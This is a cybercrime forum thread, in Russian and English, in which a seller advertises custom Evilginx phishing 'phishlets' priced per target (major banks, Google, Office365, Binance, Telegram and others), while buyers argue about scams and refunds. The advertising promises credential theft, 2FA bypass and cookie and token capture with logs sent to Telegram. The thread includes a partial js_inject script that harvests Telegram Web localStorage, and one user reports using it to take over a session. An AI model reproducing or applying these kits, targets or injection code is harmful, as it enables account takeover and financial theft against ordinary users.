🔥 Evilginx Phishlets: Реверс-прокси решения для кражи учетных данных и обхода 2FA — идеально подходит для продвинутых фишинговых наборов! 💻🔐🛡️💸

[Lebron_James]

Still waiting 11 days after i send the money

Ты проверь контакт, может на фейка попался раз так долго ждешь.
А если не с фейком общался и срок вышел пиши арбитраж

 

[blackdatabase]

Check the contact, maybe you got a fake if you waited so long.
And if you didn't communicate with a fake and the deadline expired, write to arbitration

Is me , The project requires more time than I anticipated.

 

[blackdatabase]

Siquando Forum: $2k
Website: www.siquando-forum.de (URL: www.siquando-forum.de)

Nubo: $2k
Website: www.nubo.coop (URL: www.nubo.coop)

Mailo: $2k
Website: www.mailo.com (URL: www.mailo.com)

Migadu: $2k
Website: www.migadu.com (URL: www.migadu.com)

Kolab Now: $2k
Website: www.kolabnow.com (URL: www.kolabnow.com)

Mailfence: $2k
Website: www.mailfence.com (URL: www.mailfence.com)

Seeweb: $2k
Website: www.seeweb.it (URL: www.seeweb.it)

GMX: $2k
Website: www.gmx.com (URL: www.gmx.com)

Tutanota: $2k
Website: www.tutanota.com (URL: www.tutanota.com)

Runbox: $2k
Website: www.runbox.com (URL: www.runbox.com)

WEB.DE: $2k
Website: www.web.de (URL: www.web.de)

Mail.com: $2k
Website: www.mail.com (URL: www.mail.com)

 

[scotty32]

Revisa tu contacto, tal vez hayas caído en una trampa ya que llevas tanto tiempo esperando.
Y si no te comunicaste con un falso y se acabó el plazo, escribe un arbitraje.

Already make arbittrage. Dont recommend work with him, a month passed and i still dont have the phislet

 

[blackdatabase]

Already make arbittrage. Dont recommend work with him, a month passed and i still dont have the phislet

Wait for admin ! Project is ready !

 

[blackdatabase]

EN: Please be careful when writing my name on Telegram. Many scammers create profiles similar to mine by altering letters in the username. My only official Telegram profile is ** https://t.me/blackdatabase **. Always double-check the spelling: **@ B L A C K D A T A B A S E**. If the spelling differs, it's not me. Stay vigilant to avoid fraud, and if unsure, confirm before proceeding with any transactions.

---

RU: Будьте внимательны при написании моего имени в Telegram. Многие мошенники создают профили, похожие на мой, изменяя буквы в имени пользователя. Мой единственный официальный профиль в Telegram - ** https://t.me/blackdatabase **. Всегда проверяйте правильность написания: ** @ B L A C K D A T A B A S E**. Если написание отличается, это не я. Будьте бдительны, чтобы не стать жертвой мошенничества. Если сомневаетесь, подтвердите перед любой сделкой.

 

[scotty32]

Hey! I want to give my review about the phislet. The functionality is not even 50% of the advertised. The service given by the seller is really poor, i STRONGLY Recomend that u work with scrow. He delayed more than 1 month and PLEASE dont make the error of complain because he have an attitude of delaying on purpose, block you and dont give support.

Maybe is a complex thing a reverse proxy. But dont offer the service if u dont know how to solve issues and treat nicely your customers.

I have proof for anyone who needs to that this person is not a person u can make buisness or trust. Save your time and money. A arbitragge is open. Thank god he refound me the money 40 days after...

 

[blackdatabase]

Hey! I want to give my review about the phislet. The functionality is not even 50% of the advertised. The service given by the seller is really poor, i STRONGLY Recomend that u work with scrow. He delayed more than 1 month and PLEASE dont make the error of complain because he have an attitude of delaying on purpose, block you and dont give support.

Maybe is a complex thing a reverse proxy. But dont offer the service if u dont know how to solve issues and treat nicely your customers.

I have proof for anyone who needs to that this person is not a person u can make buisness or trust. Save your time and money. A arbitragge is open. Thank god he refound me the money 40 days after...

You're just a frustrated fool, and you lie like shit!

 

[blackdatabase]

**Evilginx Phishlets**: Реверс-прокси решения для кражи учетных данных и обхода 2FA — идеально подходит для продвинутых фишинговых наборов! (Evilginx Phishlets: Reverse Proxy Solutions for Stealing Credentials & Bypassing 2FA – Perfect for Advanced Phishing Kits! )

**Продукт** (Product):
**Источник** (Source): Продается проверенный и улучшенный кастомный Evilginx с phishlets, включая **Telegram Notification Module** и усовершенствования в области безопасности. (Verified and enhanced custom Evilginx with phishlets, including **Telegram Notification Module** and security improvements.)

**Поддержка** (Support):
Вы получите **видеоинструкции и текстовые руководства** по установке и настройке. (You will receive **video tutorials and text guides** for setup and installation.)

**Phishlets** могут быть настроены индивидуально по вашим требованиям. (Phishlets can be customized based on your requirements.)

**Функции** (Features):
Автоматическое уведомление в Telegram о каждом входе в систему. (Automatic Telegram notification for each login.)
Защита от повторного использования сессий с улучшенными механизмами безопасности. (Protection against session reuse with enhanced security mechanisms.)
Полный live тест доступен для проверенных аккаунтов и после эскроу. (Full live test available for verified accounts and after escrow.)

**Преимущества** (Benefits):
- Легкая интеграция и быстрая настройка. (Easy integration and quick setup.)
- Обход 2FA и захват cookie/токенов. (Bypass 2FA and capture cookies/tokens.)
- Доступно подробное руководство с инструкциями. (Detailed guide with instructions available.)



LinkedIn: $5k ( evilpuppet )
Веб-сайт: www.linkedin.com (URL: www.linkedin.com)
Ссылка для входа: https://www.linkedin.com/login (Login URL: https://www.linkedin.com/login)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)


Intuit: $3k
Веб-сайт: www.intuit.com (URL: www.intuit.com)
Ссылка для входа: https://accounts.intuit.com/index.html (Login URL: https://accounts.intuit.com/index.html)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Telegram: $3k
Веб-сайт: www.telegram.org (URL: www.telegram.org)
Ссылка для входа: https://my.telegram.org/auth (Login URL: https://my.telegram.org/auth)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Yahoo + AOL: $5k
Веб-сайты: www.yahoo.com, www.aol.com (Websites: www.yahoo.com, www.aol.com)
Ссылки для входа: https://login.yahoo.com, https://login.aol.com (Login URLs: https://login.yahoo.com, https://login.aol.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



iCloud: $2.5k
Веб-сайт: www.icloud.com (URL: www.icloud.com)
Ссылка для входа: https://www.icloud.com (Login URL: https://www.icloud.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Google (Gmail + Google Services): $6.5k EvilPlaywright (evilpuppet)
Веб-сайт: www.google.com (URL: www.google.com)
Ссылка для входа: https://accounts.google.com/signin (Login URL: https://accounts.google.com/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



GitHub: $1k
Веб-сайт: www.github.com (URL: www.github.com)
Ссылка для входа: https://github.com/login (Login URL: https://github.com/login)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Office365: $2k (также включает Okta и GoDaddy)
Веб-сайты: www.office.com, www.okta.com, www.godaddy.com (Websites: www.office.com, www.okta.com, www.godaddy.com)
Ссылки для входа: https://login.microsoftonline.com, https://www.okta.com/login, https://sso.godaddy.com/login (Login URLs: https://login.microsoftonline.com, https://www.okta.com/login, https://sso.godaddy.com/login)
Захват электронной почты/имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email/user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Outlook: $1k
Веб-сайт: www.outlook.com (URL: www.outlook.com)
Ссылка для входа: https://outlook.live.com/owa/ (Login URL: https://outlook.live.com/owa)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Airbnb: $1k
Веб-сайт: www.airbnb.com (URL: www.airbnb.com)
Ссылка для входа: https://www.airbnb.com/login (Login URL: https://www.airbnb.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Salesforce: $1k
Веб-сайт: www.salesforce.com (URL: www.salesforce.com)
Ссылка для входа: https://login.salesforce.com (Login URL: https://login.salesforce.com)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Amazon.com: $2k
Веб-сайт: www.amazon.com (URL: www.amazon.com)
Ссылка для входа: https://www.amazon.com/ap/signin (Login URL: https://www.amazon.com/ap/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Facebook: $2k
Веб-сайт: www.facebook.com (URL: www.facebook.com)
Ссылка для входа: https://www.facebook.com/login (Login URL: https://www.facebook.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Instagram: $2k
Веб-сайт: www.instagram.com (URL: www.instagram.com)
Ссылка для входа: https://www.instagram.com/accounts/login/ (Login URL: https://www.instagram.com/accounts/login/)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Azure.com: $3k
Веб-сайт: www.azure.com (URL: www.azure.com)
Ссылка для входа: https://portal.azure.com (Login URL: https://portal.azure.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



AWS.amazon.com: $3k
Веб-сайт: aws.amazon.com (URL: aws.amazon.com)
Ссылка для входа: https://signin.aws.amazon.com/signin (Login URL: https://signin.aws.amazon.com/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Ads.microsoft.com: $3k
Веб-сайт: ads.microsoft.com (URL: ads.microsoft.com)
Ссылка для входа: https://ads.microsoft.com/login (Login URL: https://ads.microsoft.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Mobile.de: $5k
Веб-сайт: www.mobile.de (URL: www.mobile.de)
Ссылка для входа: https://www.mobile.de/login (Login URL: https://www.mobile.de/login)
Захват электронной почты и пар пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Autoscout24: $5k
Веб-сайт: www.autoscout24.com (URL: www.autoscout24.com)
Ссылка для входа: https://www.autoscout24.com/login (Login URL: https://www.autoscout24.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Blockchain.com: $5k (JS Inject MODULE + $1k)
Веб-сайт: www.blockchain.com (URL: www.blockchain.com)
Ссылка для входа: https://login.blockchain.com (Login URL: https://login.blockchain.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Binance.com: $6k
Веб-сайт: www.binance.com (URL: www.binance.com)
Ссылка для входа: https://accounts.binance.com/en/login (Login URL: https://accounts.binance.com/en/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Wells Fargo: $5k
Веб-сайт: www.wellsfargo.com (URL: www.wellsfargo.com)
Ссылка для входа: https://connect.secure.wellsfargo.com/auth/login/present (Login URL: https://connect.secure.wellsfargo.com/auth/login/present)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Citi: $5k
Веб-сайт: www.citi.com (URL: www.citi.com)
Ссылка для входа: https://online.citi.com/US/login.do (Login URL: https://online.citi.com/US/login.do)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Bank of America (Bofa): $5k
Веб-сайт: www.bankofamerica.com (URL: www.bankofamerica.com)
Ссылка для входа: https://secure.bankofamerica.com/login/sign-in/signOnV2Screen.go (Login URL: https://secure.bankofamerica.com/login/sign-in/signOnV2Screen.go)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Chase: $5k
Веб-сайт: www.chase.com (URL: www.chase.com)
Ссылка для входа: https://secure01a.chase.com/web/auth/logonbox (Login URL: https://secure01a.chase.com/web/auth/logonbox)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)



Scotiabank Canada: $4k
Веб-сайт: www.scotiabank.com (URL: www.scotiabank.com)
Ссылка для входа: https://www.scotiaonline.scotiabank.com (Login URL: https://www.scotiaonline.scotiabank.com)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)

 

[scotty32]

You're just a frustrated fool, and you lie like shit!

If u say so, i have all chat backed up. U deleted chat because u know im true. Anyway i can provide proof to ANYONE that requests in my DM.
I'm not a lier.

 

[rand]

Telegram: $3k
Веб-сайт: www.telegram.org (URL: www.telegram.org)
Ссылка для входа: https://my.telegram.org/auth (Login URL: https://my.telegram.org/auth)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are sent to Telegram.)

Уважаемый, а что вы получите от входа https://my.telegram.org/auth ? Я не так давно очень хорошо повозился с Evilginx при работе с Telegram, и очень сомнительное предложение. Даже если я перехвачу этот кук и войду в сессию my.telegram.org, как я смогу этим воспользоваться? Ну допустим я получил токены на приложение, но мне в любом случае у жертвы надо будет получить код и 2Ф при наличии если есть чтобы поднять сессию, а потом её конвертировать. В чем смысл этих движений за 3к баксов? У веб-телеграм например куки вообще не передаются и ключи в открытом виде, а по сокетам в бинарном режиме гоняются....с чем Evilginx точно не справится. Или я что-то не понимаю?

Кук перехватить можно, да. Но толку то от этого входа? (Удалить акк жертве?)

 

[Big Black Cat]

Уважаемый, а что вы получите от входа https://my.telegram.org/auth ? Я не так давно очень хорошо повозился с Evilginx при работе с Telegram, и очень сомнительное предложение. Даже если я перехвачу этот кук и войду в сессию my.telegram.org, как я смогу этим воспользоваться? Ну допустим я получил токены на приложение, но мне в любом случае у жертвы надо будет получить код и 2Ф при наличии если есть чтобы поднять сессию, а потом её конвертировать. В чем смысл этих движений за 3к баксов? У веб-телеграм например куки вообще не передаются и ключи в открытом виде, а по сокетам в бинарном режиме гоняются....с чем Evilginx точно не справится. Или я что-то не понимаю?

Кук перехватить можно, да. Но толку то от этого входа? (Удалить акк жертве?)

Потому что пихает в свой список все подряд, лишь бы покупатель повелся

 

[blackdatabase]

Dear Sir, what will you get from logging in to https://my.telegram.org/auth ? I recently had a lot of fun with Evilginx when working with Telegram, and it's a very dubious proposition. Even if I intercept this cookie and log in to the my.telegram.org session, how can I use it? Well, let's say I received tokens for the application, but in any case I'll need to get the code and 2F, if any, from the victim to raise the session, and then convert it. What's the point of these movements for 3k bucks? For example, web telegrams don't transmit cookies at all and the keys are in the open form, but they chase around sockets in binary mode... which Evilginx definitely can't handle. Or am I missing something?

I don't quite understand what you're saying, but regarding Telegram, if you'd like, I invite you to test the project. Telegram uses local tokens, and like Google's, these can be cloned, and it works perfectly (it only uses local tokens). The login data, of course, is useless and only for display.

 

[blackdatabase]

js_inject:
- trigger_domains: ["web.telegram.org"]
trigger_paths: ["/k(.*)"]
trigger_params: []
script: |
let previousTime = '';

function logTimeLoop() {
const currentLocalStorageState = {};

for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
currentLocalStorageState[key] = value;
}

 

[rand]

js_inject:
- trigger_domains: ["web.telegram.org"]
trigger_paths: ["/k(.*)"]
trigger_params: []
script: |
let previousTime = '';

function logTimeLoop() {
const currentLocalStorageState = {};

for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
currentLocalStorageState[key] = value;
}

Спасибо за наводку. Протестирую.

 

[blackdatabase]

Thanks for the tip. I'll test it.

I read your recent post. Come to private chat so I can give you the full code and explain it to you. I have only sold this project once.

 

[rand]

Потому что пихает в свой список все подряд, лишь бы покупатель повелся

Не, он сбросил мне на тест фишлет для web.telegram.org/k/ - я еще его не тестил (завтра опробую, отпишу что да как), но хочу сказать этот код похож на правду, потому-что по факту я начал изучать Evilginx3, 2 дня назад, и до JS-инъекций еще не дошел. Там как раз то что нужно, local storage, а не перехват Cookie, которые telegram не использует.

 

[blackdatabase]

No, he sent me a phishlet for web.telegram.org/k/ for testing - I haven't tested it yet but I want to say it seems to be true, because in fact I started studying Evilginx3 2 days ago and haven' haven't gotten to JS injections yet. It has exactly what you need, local storage.

You can test simple by collect local cookies from chrome where telegram ready registred and use them ( u can find addons in chrome ) , from here to make an js injection to do this is just time .

 

[blackdatabase]

Because he shoves everything into his list, just so the buyer will buy in.

js_inject:
- trigger_domains: ["web.telegram.org"]
trigger_paths: ["/k(.*)"]
trigger_params: []
script: |
let previousTime = '';

function logTimeLoop() {
const currentLocalStorageState = {};

for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
currentLocalStorageState[key] = value;
}

Very simple to put tags man! I see u are a coder . u can test this , u are a smart guy ! The projects i not have maid , are whit status preorder .

 

[rand]

Все нормально, фишлет для "web.telegram.org/k/" отрабатывает, разобрался без инструкций и подсказок ТС, чуть-чуть модернизировал под себя. Спасибо автору топика за предоставленный фишлет, сэкономил несколько бесонных ночей это точно, огромное спасибо. В сессию зашел, пруфы: